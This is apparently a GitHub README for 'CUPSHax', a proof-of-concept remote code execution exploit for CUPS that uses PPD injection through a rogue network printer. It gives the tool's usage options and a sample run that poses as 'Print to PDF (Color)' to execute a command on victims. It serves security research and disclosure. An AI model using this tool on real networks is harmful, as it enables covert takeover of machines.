/cupshax

Primary LanguagePython

CUPSHax

Quick proof of concept for the recent CUPS exploit. I was planning to clean it up a lot more, but the embargo was lifted a lot sooner than expected, so the code is a bit rushed.

For all the technical details you should honestly just read Evilsocket's writeup.

This exploit was written after spotting this commit in the public OpenPrinting CUPS repo. There are probably cleaner injection points.

This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network.

Usage

The exploit uses zeroconf and ippserver, both can be installed via pip.

usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT] [--base64 | --no-base64]

A CUPS PPD injection PoC

options:
  -h, --help            show this help message and exit
  --name NAME           The name to use (default: RCE Printer)
  --ip IP               The IP address of the machine running this script
  --command COMMAND     The command to execute (default: 'touch /tmp/pwn')
  --port PORT           The port to connect on (default: 8631)
  --base64, --no-base64
                        Wrap the command in base64 (default: enabled)

For example:

python cupshax.py --name "Print to PDF (Color)" \
                  --command "id>/tmp/pwn" \
                  --ip 10.0.0.3